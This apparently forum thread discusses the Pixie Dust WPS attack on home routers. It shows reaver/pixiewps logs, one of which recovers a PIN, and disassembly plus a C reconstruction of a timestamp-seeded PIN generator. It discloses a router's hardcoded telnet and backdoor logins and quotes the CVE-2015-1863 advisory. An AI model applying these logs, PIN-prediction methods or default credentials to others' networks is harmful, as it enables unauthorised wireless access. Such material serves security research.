Sounds good. Great work everybody involved.
Got my first Belkin today. The first pin generated was the correct one.
With pixie dust or the pin generator? Model number?
with the -W1 option.
Hi, soxrok... I see APs on Wireshark... and there is a problem... Pixie sees wrong values... Look at the screenshots...
http://imgur.com/XslVDB6
Code:
Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 07:34:36:3e:4a:0e:38:df:e7:cd:fa:15:85:92:9e:71
[P] PKE: 0d:da:3b:db:55:f3:68:cf:55:2b:98:93:18:0a:f4:77:28:58:3d:45:25:58:0a:35:f0:5c:b3:89:7e:3e:3a:f9:dc:49:0a:dd:7f:f0:bb:61:3d:20:8a:fb:d7:d7:17:d0:fa:94:ad:26:5a:8d:70:9e:a1:3c:7f:cb:69:9c:a1:a7:f7:b5:d7:bf:6b:d4:fb:7c:e4:51:fb:f9:6b:9c:ef:5b:94:6c:7d:7a:4e:40:11:49:83:3d:bb:84:2a:cc:23:f9:3c:63:7f:af:70:4b:28:33:ea:f5:f5:05:38:19:76:09:8c:6a:8b:37:9e:27:ec:63:96:c1:f4:ab:23:27:d9:57:30:3b:b9:9d:55:e9:76:5d:81:5c:07:b4:8c:90:0c:02:37:9c:2f:f7:2d:6f:5b:b2:a0:4f:ee:9a:88:a1:1f:f4:3f:bd:78:6f:d5:8a:48:6f:fe:c7:b7:c2:da:9e:68:b8:35:0e:3e:e5:f3:4d:e1:4b:5f:b0:08:c9:d4:9e:a7:93
[P] WPS Manufacturer: AirTies Wireless Networks
[P] WPS Model Number: 1.0.2.0
[P] Access Point Serial Number: AT1731434014674
[+] Received M1 message
[P] PKR: 07:a0:3b:9f:28:60:17:1f:38:52:9e:7e:0b:5f:ef:04:62:15:b6:86:05:cb:4b:ee:f4:64:4f:a1:fd:35:da:3e:54:a6:26:c7:93:2a:b5:00:1c:e7:81:37:58:e8:ec:d1:fb:08:3a:f3:44:53:64:a1:41:02:25:ed:41:87:a5:85:aa:c6:98:87:7c:41:8f:a0:e6:96:0b:52:b3:bf:18:05:00:18:16:f0:4c:12:41:e1:bc:ca:e5:12:d0:67:2a:99:cb:04:2f:bb:21:22:9b:99:38:13:5b:ed:44:52:4e:f8:35:81:9f:98:63:f7:98:d9:6a:6f:a2:e8:3b:71:13:cd:e4:6a:b9:3e:51:d2:43:7f:a1:eb:7f:6a:74:5b:06:b2:29:55:5e:c9:27:36:a9:d7:1a:e0:3e:78:35:63:68:33:10:8c:44:64:96:86:96:03:74:d8:59:df:47:03:26:e3:5c:5b:93:18:ac:71:39:29:c5:4e:98:ef:3e:77:73:6a
[P] AuthKey: 99:58:17:50:f0:15:e3:c8:aa:75:c0:0f:fe:47:d7:b8:e8:f7:bf:af:9d:8a:64:91:74:1c:6f:36:21:1d:72:d5
[+] Sending M2 message
[P] E-Hash1: 80:3f:98:56:4f:6c:f7:64:bf:e9:39:9a:d9:39:24:04:7b:b4:84:44:48:81:6a:6b:e3:ba:c5:ee:86:c5:d1:32
[P] E-Hash2: 79:d2:d0:6a:0e:12:82:d8:ae:9f:32:aa:21:95:07:ef:45:12:78:a6:ba:60:c2:aa:24:a2:db:b2:ca:51:8b:bb
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 2 s
[Pixie-Dust]
http://imgur.com/fnrrZUn
Code:
Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 6a:34:66:5e:16:2c:db:cb:5b:11:f7:cc:78:a3:a0:c9
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] PKR: 19:fc:9c:fb:93:99:c3:5b:96:d8:d1:71:92:2e:64:89:85:5e:b8:c2:51:cc:f0:3d:e5:87:ef:8a:4d:5b:fd:63:bb:4d:ac:1d:d5:fd:ec:a6:ab:f2:35:80:33:bc:c9:61:4f:f5:6b:51:ce:1c:64:dd:c8:e2:a2:aa:98:5d:b0:8c:fe:90:1f:db:fb:a1:13:ec:55:29:4f:3e:49:3a:80:62:4d:fe:77:9e:6e:78:25:5f:5d:30:8f:34:20:2a:28:82:2f:08:23:af:86:79:29:1c:be:e8:75:af:c8:a7:e9:90:52:2a:15:cd:49:21:c0:00:62:91:3e:1e:94:11:55:92:28:54:81:89:f9:af:99:b8:f4:7a:29:80:0a:92:69:18:63:97:5f:85:73:51:af:9b:63:fb:a3:dc:0e:7d:eb:2b:23:3d:8b:4f:50:e5:eb:9b:bc:7e:d6:2b:21:93:09:52:6b:8a:71:d0:33:31:6c:82:01:f3:ee:85:77:97:2c:ae
[P] AuthKey: 2b:da:97:bc:a7:06:a8:e9:94:6e:ff:f3:70:e3:84:8d:ec:48:ad:b0:ba:49:74:6b:a0:31:93:db:ac:71:9a:09
[+] Sending M2 message
[P] E-Hash1: 88:a0:55:ea:db:12:db:0d:f4:61:91:5c:3f:e7:11:07:6d:5a:1f:57:b2:7e:fc:6e:34:29:3f:2a:de:56:c8:74
[P] E-Hash2: 97:c4:d6:06:29:db:a1:bf:4c:e9:96:c2:ee:6f:dd:e6:df:b6:30:c1:20:68:e5:2e:d2:ef:d6:82:43:38:31:b6
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 2 s
[Pixie-Dust]
http://imgur.com/1MrIW4K
Code:
Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: da:42:7d:5e:4c:b6:a3:98:b5:f3:41:77:42:8e:a6:d8
[P] PKE: c6:bc:d8:bc:9a:be:0e:e3:ef:06:dd:55:bc:07:79:1b:56:32:76:fd:63:b9:b1:84:a6:6a:fe:ec:98:d8:d1:ae:62:fe:23:e1:c1:93:39:81:5a:ff:69:56:32:28:12:3e:2b:de:7a:d6:79:93:0a:b2:3a:fd:35:e2:03:2b:e7:4b:08:fc:81:76:c9:46:1a:8b:96:1a:f3:bf:85:99:f8:fb:d3:b5:91:a9:96:92:ad:fd:90:17:45:a6:34:9a:01:9f:a0:df:4d:a3:d4:0e:38:bc:79:b2:9e:38:c2:7b:5e:8c:97:b9:23:89:6c:91:e1:ae:82:bf:f0:86:06:ff:11:da:30:14:dc:39:28:c6:51:07:05:a3:b0:50:93:5b:50:44:8a:5f:19:e8:a7:2c:86:22:21:b4:2a:11:40:e7:e8:53:e5:0d:7f:b1:90:a2:01:c7:7a:5e:65:2a:cc:13:7d:3b:3c:00:67:00:ee:66:40:93:7e:7d:c9:0b:d8:62:fc:37
[P] WPS Manufacturer: ZyXEL
[P] WPS Model Number: P-660W-T1 v3
[P] Access Point Serial Number: 00000001
[+] Received M1 message
[P] PKR: 80:d4:14:fc:c5:52:20:b5:15:b0:e4:4d:d4:ed:39:aa:aa:04:7c:b5:b4:c7:a7:68:f3:53:5a:d6:1b:40:74:66:45:88:19:ab:32:54:ff:62:c7:73:3e:f8:20:1e:39:7b:98:2e:79:2a:6f:2c:c0:f5:2c:11:af:8b:fc:ed:5b:09:03:bb:05:15:c3:b4:2a:1e:ec:8a:11:ee:ef:45:b0:8f:4d:47:5c:76:ed:8f:01:c5:4f:38:2e:58:25:54:df:af:9a:c7:9e:d4:1f:d5:ae:9b:47:87:7e:91:03:74:62:52:b7:c7:b8:30:27:a5:77:8f:42:f4:1c:d7:8c:40:71:ce:41:ae:c5:92:d4:7f:90:9b:ee:7f:f7:6f:c6:8c:74:c6:8e:aa:50:65:b4:7f:42:ce:e3:76:54:fb:cc:1d:c9:93:2a:96:15:76:4b:86:9a:18:8f:f8:17:48:4f:5c:d6:37:29:be:e1:4e:95:91:4b:21:fa:2c:2c:73:57:88:f4:0b
[P] AuthKey: c5:d7:f1:9d:c1:ae:3a:ff:ba:91:7e:74:e3:22:ab:d2:1c:4e:fe:d8:e4:77:07:76:2a:14:92:e5:e1:67:99:c9
[+] Sending M2 message
[P] E-Hash1: 23:21:cc:28:94:70:12:dc:15:1b:cc:92:55:18:bf:5f:7b:8a:4e:cd:34:a8:2a:21:03:57:ef:3d:a3:4b:4f:9b
[P] E-Hash2: c4:52:d0:f5:c8:46:cf:d4:4d:bd:f1:49:2e:ea:a2:7a:c9:47:d5:4f:5c:de:f2:67:19:74:40:a0:87:0b:e8:cf
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 1 s
[Pixie-Dust]
Code:
Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 87:22:86:c8:e7:13:9b:77:7d:08:0b:74:85:2b:c0:e4
[P] PKE: a5:e7:ee:d7:ae:0b:3c:c4:4d:d8:fe:d1:91:b1:a6:88:68:dc:08:af:e7:19:70:7e:b3:4e:56:1b:d7:06:30:6a:92:a6:c2:6a:2f:ad:1d:0b:c0:fb:73:8d:63:5c:33:8a:8d:b0:01:70:c4:e0:c5:6e:fb:33:85:ef:1a:e6:1e:7d:e2:77:70:bc:a0:9a:eb:05:d5:bc:12:ef:d7:9b:96:44:2c:8e:34:b5:57:36:e1:9f:fc:9d:c0:22:de:4d:a0:91:c4:83:d4:39:d3:fb:91:5e:0d:b1:5c:2e:bb:89:c5:d4:c8:69:ad:8a:b3:f3:57:71:ee:37:66:af:5a:a6:ec:c0:13:47:6b:2e:29:88:93:d4:0d:0e:fc:c7:a4:3f:12:53:62:e4:91:8f:60:c3:81:65:c7:9c:eb:33:47:77:7b:da:23:6f:64:e7:f5:3d:09:68:e8:a9:a1:5c:6b:7e:59:e5:06:15:c2:1a:2d:3b:f3:8e:b5:ea:f8:81:f4:74:d9:fc
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[P] Access Point Serial Number: 14CC200000*
[+] Received M1 message
[P] PKR: 71:ad:3b:95:65:b4:e3:1e:28:da:2a:d3:98:88:5f:23:4a:07:a1:21:37:45:87:ea:e5:47:01:0a:ba:65:be:7f:52:02:b0:82:3a:b1:f0:ed:17:8f:54:3a:35:a8:8c:65:cc:53:fe:67:23:ea:81:ac:9e:15:48:55:3f:97:bd:29:41:c9:f6:b5:7d:23:b5:3e:63:fc:68:9a:8f:91:e4:a4:ff:2e:9a:12:1c:87:a6:f9:9a:f2:b9:c0:21:a7:61:c4:39:28:1d:1a:5c:e4:66:9d:14:08:9f:2c:0a:e7:c1:f8:54:f5:a8:7e:81:5f:eb:ce:74:09:f8:1d:cb:46:fc:2e:c6:29:f3:c1:93:ba:62:ee:de:54:f4:21:40:55:e8:37:bb:27:52:e7:56:dd:02:09:57:84:4b:f8:78:ed:49:f7:89:7a:23:e3:b3:52:9e:8a:6b:2a:1b:64:b5:77:fd:0b:3e:ba:17:2f:fd:1d:a9:48:d6:39:97:68:4f:fb:28:bc
[P] AuthKey: 10:91:7d:d9:5a:ab:2b:0b:b6:90:db:6e:52:50:ce:c5:8e:3e:6a:91:51:32:50:bc:9a:a1:70:16:29:b9:c9:d0
[+] Sending M2 message
[P] E-Hash1: cd:8e:34:12:12:61:ae:92:9f:ef:fd:7a:88:55:03:3f:5a:52:ad:27:7a:b4:f3:ec:08:1c:07:ab:e9:61:6d:fc
[P] E-Hash2: 6e:a2:a5:cc:2b:94:ff:d9:9e:fd:d2:d3:5a:dd:73:c0:51:40:92:a7:85:3f:cc:ff:40:ab:bf:e1:15:7c:fa:57
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 2 s
[Pixie-Dust]
AND this AP is VULNERABLE, Pixie sees true values
http://imgur.com/zlmrfjO
Code:
Trying pin 12345670.
.............................
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] PKR: ................ e:e4:84:ca:d7:97:fb:98:a9:a3:fb:ca:db:5e:d7:4d:04:b9:80
[P] AuthKey:
[+] Sending M2 message
[P] E-Hash1:
[P] E-Hash2:
[Pixie-Dust]
[Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] PSK1: 11:95:69:82:fa:31:a9:2b:2e:5d:f3:9d:02:6b:1c:f5
[Pixie-Dust][*] PSK2: 6a:e0:0a:ed:09:16:46:66:f4:ef:88:3d:4c:ed:95:ae
[Pixie-Dust] [+] WPS pin: 71632285
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]
I think this is the problem, so Pixie is not vulnerable on Realtek, Broadcom and Atheros chipsets...
I don't know, but probably.
Last edited by Saydamination; 2015-05-16 at 21:14.
hello
Hold on a second my friend: this thread is to speak about the pixie dust attack "theoretically", not for reporting bugs using modified reaver (you have another thread for that).
pixiewps (you have another thread to speak about it) does not "see" any value, "Pixie sees wrong values."
Either you enter the value manually, or you use a script, or you are using the automated reaver (that is the case)...
I suggest you post in the correct thread: Reaver modification for Pixie Dust Attack
cheers
When it's ready. I was told very soon. Kept checking back here. Or you could follow the GitHub.
I can beta also
Hi,
Got the Firmware, unpacked with fmk, checked with idapro.
Found this function in wscd (it's the "gen-pin" function from the .sh script), but I'm not that good at MIPS; the (in my opinion) important parts are marked, maybe someone who's familiar with MIPS can tell something about it.
Code:
LOAD:0040C4C4 la $t9, gettimeofday
LOAD:0040C4C8 move $a1, $zero
LOAD:0040C4CC jalr $t9 ; gettimeofday
LOAD:0040C4D0 addiu $a0, $sp, 0xF0+var_68
LOAD:0040C4D4 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C4D8 lw $a0, 0xF0+var_68($sp)
LOAD:0040C4DC la $t9, srand
LOAD:0040C4E0 nop
LOAD:0040C4E4 jalr $t9 ; srand
LOAD:0040C4E8 nop
LOAD:0040C4EC lw $gp, 0xF0+var_D8($sp)
LOAD:0040C4F0 nop
LOAD:0040C4F4 la $t9, rand
LOAD:0040C4F8 nop
LOAD:0040C4FC jalr $t9 ; rand
LOAD:0040C500 nop
LOAD:0040C504 li $v1, 0x6B5FCA6B
LOAD:0040C50C mult $v0, $v1
LOAD:0040C510 sra $a0, $v0, 31
LOAD:0040C514 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C518 nop
LOAD:0040C51C la $t9, 0x400000
LOAD:0040C520 nop
LOAD:0040C524 addiu $t9, (sub_404128 - 0x400000)
LOAD:0040C528 mfhi $v1
LOAD:0040C52C sra $v1, 22
LOAD:0040C530 subu $a1, $v1, $a0
LOAD:0040C534 sll $a0, $a1, 5
LOAD:0040C538 subu $a0, $a1
LOAD:0040C53C sll $v1, $a0, 6
LOAD:0040C540 subu $v1, $a0
LOAD:0040C544 sll $v1, 3
LOAD:0040C548 addu $v1, $a1
LOAD:0040C54C sll $a0, $v1, 2
LOAD:0040C550 addu $v1, $a0
LOAD:0040C554 sll $v1, 7
LOAD:0040C558 subu $a1, $v0, $v1
LOAD:0040C55C sll $s0, $a1, 2
LOAD:0040C560 move $a0, $a1
LOAD:0040C564 jalr $t9 ; sub_404128
LOAD:0040C568 addu $s0, $a1
LOAD:0040C56C lw $gp, 0xF0+var_D8($sp)
LOAD:0040C570 sll $s0, 1
LOAD:0040C574 addu $a0, $s0, $v0
LOAD:0040C578 la $t9, 0x400000
LOAD:0040C57C nop
LOAD:0040C580 addiu $t9, (sub_403F60 - 0x400000)
LOAD:0040C584 jalr $t9 ; sub_403F60
LOAD:0040C588 addiu $a1, $sp, 0xF0+var_D0
LOAD:0040C58C lw $gp, 0xF0+var_D8($sp)
LOAD:0040C590 addiu $a1, $sp, 0xF0+var_D0
LOAD:0040C594 la $a0, 0x440000
LOAD:0040C598 la $t9, printf
LOAD:0040C59C nop
LOAD:0040C5A0 jalr $t9 ; printf
LOAD:0040C5A4 addiu $a0, (aPinS - 0x440000) # "PIN: %s\n"
LOAD:0040C5A8 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C5AC li $a0, 0xADAC
LOAD:0040C5B0 addu $a0, $s2, $a0
LOAD:0040C5B4 la $t9, strcpy
LOAD:0040C5B8 b loc_40C8C0
LOAD:0040C5BC addiu $a1, $sp, 0xF0+var_D0
WoW
Thank you SO MUCH someone else (I mean you, not someone else)
It is much more "readable" than what I got.
I am not used to MIPS either (my poor skills in disassembling speak for themselves :P)
I will try with the tool you used, I am curious about LOAD:0040C8C0 / and checking sub_404128 / sub_403F60
The very last line you underline is definitely like a simple "printf" that writes the value of the PIN to "stdout"
SO GREAT!
First, thanks to you, we know 100% for sure that the build time is the string used, with some randomization.
The startup.sh script was giving a strong clue: time was "generated" just before the PIN....
Another clue: we already know that time is used as a seed for the Diffie-Hellman key exchange.
Now we know: time is definitely and surely used to generate the default PIN
And it is the first build time.
That's kind of an issue if we look for a way to generate the exact default PIN... depending on the randomization, but it looks like this with the devices I saw; we might be able to guess the first digits correctly by relating them to the year of production, then the PIN respects the checksum, so the seconds start on 7 digits
One hour is 3600 seconds and we would need to be within about 15 minutes more or less of the exact build time to get the first half of the PIN... sorry for my English, but I guess you see what I mean...
But a little pixie flying around told me that this kind of "unsupported Realtek" would, maybe, who knows?, not be unsupported anymore for so long....
Thanks so much for the information, it is helping a lot.................
Last edited by kcdtv; 2015-04-28 at 21:46.
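To make the disassembly above and the build-time reasoning concrete, here is my reading of that routine rewritten in C (an added reconstruction, not wscd's source). The multiply by 0x6B5FCA6B followed by mfhi/sra 22 is a division by 10,000,000, the shift-and-add chain rebuilds that quotient times 10^7, so $a1 ends up as rand() % 10^7; s0 becomes that value times 10 and the result of sub_404128 is added, which is exactly how a WPS PIN's eighth (checksum) digit is appended, so I assume sub_404128 is the WSC checksum. The host's rand() is not the router's uClibc rand(), so only the structure is reproduced, not the device's actual digits; the seed value is constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* WSC PIN checksum: weights 3,1,3,1,3,1,3 over the first seven digits.
 * Returns the eighth digit that makes the PIN valid. */
int wps_checksum(uint32_t pin7)
{
    uint32_t t = pin7 * 10;          /* shift digits into the 8-digit positions */
    uint32_t accum = 0;
    accum += 3 * ((t / 10000000) % 10);
    accum += 1 * ((t / 1000000) % 10);
    accum += 3 * ((t / 100000) % 10);
    accum += 1 * ((t / 10000) % 10);
    accum += 3 * ((t / 1000) % 10);
    accum += 1 * ((t / 100) % 10);
    accum += 3 * ((t / 10) % 10);
    return (int)((10 - accum % 10) % 10);
}

/* Validate an 8-digit PIN against its checksum digit (what an enrollee/registrar checks). */
int wps_pin_valid(uint32_t pin8)
{
    if (pin8 > 99999999u)
        return 0;
    return (int)(pin8 % 10) == wps_checksum(pin8 / 10);
}

/* Reading of the gen-pin routine: gettimeofday -> srand(tv_sec) -> rand() -> % 10^7 ->
 * append checksum. Assumption: sub_404128 is the checksum above; the host libc's rand()
 * stands in for the router's, so the digits differ but the construction is the same. */
uint32_t realtek_style_gen_pin(unsigned int seed_tv_sec)
{
    srand(seed_tv_sec);
    uint32_t r = (uint32_t)rand() % 10000000u;   /* the 0x6B5FCA6B / sra 22 sequence */
    return r * 10 + (uint32_t)wps_checksum(r);   /* s0 = a1*10, plus sub_404128(a1) */
}

/* The printf("PIN: %s\n") path needs the PIN as a string; sub_403F60 is assumed to do this. */
void format_pin(uint32_t pin8, char out[9])
{
    snprintf(out, 9, "%08u", pin8);
}

int main(void)
{
    /* Constructed seed: a plausible build timestamp, not a value from any real device. */
    uint32_t pin = realtek_style_gen_pin(1398713400u);
    char buf[9];
    format_pin(pin, buf);
    printf("PIN: %s (checksum valid: %d)\n", buf, wps_pin_valid(pin));
    /* The PIN pixiewps recovered in the Ralink output above, 71632285, carries checksum 5. */
    printf("checksum(7163228) = %d\n", wps_checksum(7163228));
    return 0;
}
```

The defensive point is the seed: a PIN that is a deterministic function of one timestamp is only as unpredictable as that timestamp, which is why a factory default PIN of this kind should be regenerated or WPS turned off.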
DOH! How did I forget about fmk, but the last time I used it was when I was taking part in "jailbreaking" the NeoTV 300b. Looks like I've got some playing to do :-D
Hello kcdtv,
I have the same kind of model you posted, an Alfa Network AIP-W525H (version 1) with firmware v2.5.2.a1, just to tell you that you can change this "permanent" WPS pin, and not only that but also the MAC address. There are 2 ways to do it:
- you can issue commands over telnet 192.168.2.1 23, login as root and 5up as pass
- you can issue commands over the web on a hidden page http://192.168.2.1/syscmd.asp
Indeed there's the wscd command that allows you to generate and assign pins with arguments like -gen-pin, generate pin code for local entitiy (it's misspelled in the source code); -peer_pin, assign pin code for peer entitiy; -local_pin, assign pin code for local device
With wscd -gen-pin you can generate pins randomly, but there's another command tool named flash (like nvram) that stores values permanently over reboots:
// get WPS pin
# flash get wlan0 HW_WSC_PIN
HW_WSC_PIN="77756886"
// generate a "random" WPS pin
# flash -gen-pin
// save a new pin manually for instance 88884444 (reboot afterwards to take effect)
# flash set wlan0 HW_WSC_PIN 88884444
// change mac address permanently on wlan0
# flash set wlan0 HW_WLAN_ADDR 00c0ca1c2014
// change mac address temporarily (until reboot) on wlan0 (to take effect do >> ifconfig wlan0 down && ifconfig wlan0 up)
# ifconfig wlan0 hw ether 00c0ca111111
About that pin generator -gen-pin, I did find stuff in some extracted files from the firmware, but I missed some stuff that I need to extract again because it was long ago, and over telnet I saw more info.
Did you have a look at the source code of this web page http://192.168.2.1/wlwps.asp?
There's a function genPinClicked(); maybe it will help to look it up.
Congrats everyone for your efforts
Last edited by reversetheg@p; 2015-04-29 at 15:58. Reason: duplicated quote
WoW && WoW
Like someone else you are amazing too
That's actually one of the most exciting threads, full of amazing people, you guys rule!
Originally Posted by reversetheg@p: "- you can issue commands over telnet 192.168.2.1 23 login as root and 5up as pass"
YES!
You don't know how much I was looking for that!
'cause I noticed telnet is enabled even though there is no way to enable / or disable it / or configure it (from the web interface with the proposed option)
But I couldn't log in.
Now I can, thank you SO MUCH, that's awesome
By the way, did you notice this permanent "super" backdoor?
With credentials super:super you can log in with administrator privileges. (but not in telnet)
Originally Posted by reversetheg@p: "- you can issue commands over web on a hidden page http://192.168.2.1/syscmd.asp"
I get a 404 error when I try to access this web page or if I try to execute a command through a POST request (but I am not used at all to this so maybe I do something wrong)
I also use version v3.2.0.2.6, different from yours. I should make a downgrade to check all these very interesting and fundamental elements that you bring to us.
Thanks for showing us and explaining to us all this system around PIN management (and so much more, this is tremendous information)
@kcdtv
i'm glad, that i could help and i'm with you: great thread !
And a little update :
VULNERABLE:
Edimax
Fonera Fon 2.0n (FON 2303B)
Ralink RT 3052
Code:
[P] E-Nonce: 72:a5:2f:83:81:21:32:85:04:2c:30:60:d8:cf:ab:9e
[P] PKE: 6a:b2:23:7b:37:81:58:2c:f6:a1:0c:f9:a8:ec:4c:14:70:dc:0b:70:a1:cb:1e:dc:0a:22:17:2d:b0:83:c4:bc:3a:47:b7:39:a9:63:ea:57:ff:38:ba:61:6d:2f:f7:45:96:45:80:70:1d:cf:27:1f:8a:84:52:77:e0:5c:e9:c1:72:9d:e7:8a:20:70:aa:29:e3:3d:ea:01:c5:34:c9:70:64:e3:72:c7:9a:08:b5:86:61:32:a0:7d:80:b6:e1:9c:5c:57:ab:90:4b:f5:24:50:cb:3e:31:e3:6e:d0:f9:a2:67:ab:69:71:07:9d:35:fc:97:0d:25:fa:2f:a3:d2:be:ae:eb:a2:34:9e:e5:f6:92:27:80:88:0b:fc:24:ee:b3:47:e9:35:17:a1:f5:c2:72:58:44:e6:cd:49:05:4a:2a:23:26:a3:99:8d:ae:54:bd:a7:c0:7c:3a:52:28:fc:58:a6:2b:aa:dc:b5:88:4d:b9:4f:04:41:98:82:25:2a:0a
[P] PKR: 5d:8e:b8:d7:5d:71:79:d3:c1:d5:b1:72:b4:d0:8d:85:f0:5c:13:5f:1e:8c:35:fb:83:2e:15:9a:c9:ed:0f:bf:45:48:93:77:38:2f:90:4a:4c:53:ae:4b:ee:18:4d:cc:d8:98:d8:6c:98:b2:3f:45:fe:0c:52:1b:69:75:b4:85:d0:44:1e:ca:ad:8c:57:b6:a5:13:72:5a:8b:0d:38:1a:50:21:24:71:14:7d:13:72:65:92:53:1c:de:f3:a9:03:c5:ba:65:ff:64:c8:ac:84:00:7b:c9:8b:03:61:6c:9b:39:56:4d:3a:27:a8:66:de:79:99:a2:ab:82:9c:e2:98:53:61:ba:8d:d3:9b:47:4e:d3:ff:f1:8d:e0:61:39:f6:9f:35:a2:2f:23:c4:ed:af:da:a0:77:bc:b2:db:36:21:8c:9d:14:27:96:61:22:89:37:33:09:fa:2b:1f:f0:99:9e:ea:e8:59:ad:bc:8d:d9:75:0a:db:c9:f9:43:ba:83
[P] AuthKey: 54:76:bd:c3:63:02:b2:fe:02:dd:fb:2e:db:e5:3d:2f:0f:4e:a9:e2:bc:cb:fb:d6:58:a9:47:c8:ea:56:99:34
[P] E-Hash1: 08:80:1e:79:8c:5f:27:fb:09:d3:35:cb:e3:59:67:c2:c6:48:4b:d3:0f:5a:cc:42:05:c9:80:e9:83:36:ea:c2
[P] E-Hash2: 6c:b5:bb:78:81:8d:c1:41:af:c0:32:91:8a:b6:13:64:fe:39:26:b6:76:85:ad:e7:37:d9:cc:7e:d2:c1:db:41
@kcdtv pointed out a newly documented "flaw", I guess I would call it: http://w1.fi/security/2015-1/wpa_sup...d-overflow.txt
It was something I was actually considering a few days ago, but I guess people beat me to it :P
Anyways, it looks like this may be a gateway into a bunch more information... potentially information dumps, router reboots, memory leaks, the list goes on and on. I personally don't know how to implement it. There is an option in mdk3 that does something similar, but it doesn't work for these purposes... maybe it can be modified? If you run mdk3 --fullhelp I think the command is p but I don't recall.
If you don't want to click the link, it is just a text document:
That text is not mine, it comes verbatim from the link I posted above. I take no credit and do not mean to infringe any copyrights or screw with any legal stuff that I don't know about.
Code:
wpa_supplicant P2P SSID processing vulnerability

Published: April 22, 2015
Identifier: CVE-2015-1863
Latest version available from: http://w1.fi/security/2015-1/

Vulnerability

A vulnerability was found in how wpa_supplicant uses SSID information parsed from management frames that create or update P2P peer entries (e.g., Probe Response frame or number of P2P Public Action frames). SSID field has valid length range of 0-32 octets. However, it is transmitted in an element that has a 8-bit length field and potential maximum payload length of 255 octets. wpa_supplicant was not sufficiently verifying the payload length on one of the code paths using the SSID received from a peer device.

This can result in copying arbitrary data from an attacker to a fixed length buffer of 32 bytes (i.e., a possible overflow of up to 223 bytes). The SSID buffer is within struct p2p_device that is allocated from heap. The overflow can override couple of variables in the struct, including a pointer that gets freed. In addition about 150 bytes (the exact length depending on architecture) can be written beyond the end of the heap allocation.

This could result in corrupted state in heap, unexpected program behavior due to corrupted P2P peer device information, denial of service due to wpa_supplicant process crash, exposure of memory contents during GO Negotiation, and potentially arbitrary code execution.

Vulnerable versions/configurations

wpa_supplicant v1.0-v2.4 with CONFIG_P2P build option enabled

Attacker (or a system controlled by the attacker) needs to be within radio range of the vulnerable system to send a suitably constructed management frame that triggers a P2P peer device information to be created or updated.

The vulnerability is easiest to exploit while the device has started an active P2P operation (e.g., has ongoing P2P_FIND or P2P_LISTEN control interface command in progress). However, it may be possible, though significantly more difficult, to trigger this even without any active P2P operation in progress.

Acknowledgments

Thanks to Google security team for reporting this issue and smart hardware research group of Alibaba security team for discovering it.

Possible mitigation steps

- Merge the following commits to wpa_supplicant and rebuild it:
  P2P: Validate SSID element length before copying it (CVE-2015-1863)
  This patch is available from http://w1.fi/security/2015-1/
- Update to wpa_supplicant v2.5 or newer, once available
- Disable P2P (control interface command "P2P_SET disabled 1" or "p2p_disabled=1" in (each, if multiple interfaces used) wpa_supplicant configuration file)
- Disable P2P from the build (remove CONFIG_P2P=y)
Anyways, I guess SSID information comes from management frames, which are unencrypted packets.... check it out here: http://www.wi-fiplanet.com/tutorials...le.php/1447501 They can't be encrypted because they "establish and maintain connections" (quoted from Wi-Fi Planet), making it a whole lot easier for attackers. There is no encryption to break so it should be a fairly straightforward process.
If you are worried about this, I suggest you get an AP that supports 802.11w. Read about it here: http://www.cisco.com/c/en/us/td/docs...apter_0100.pdf
Let me know what you think about this!
Last edited by soxrok2212; 2015-04-30 at 00:40.
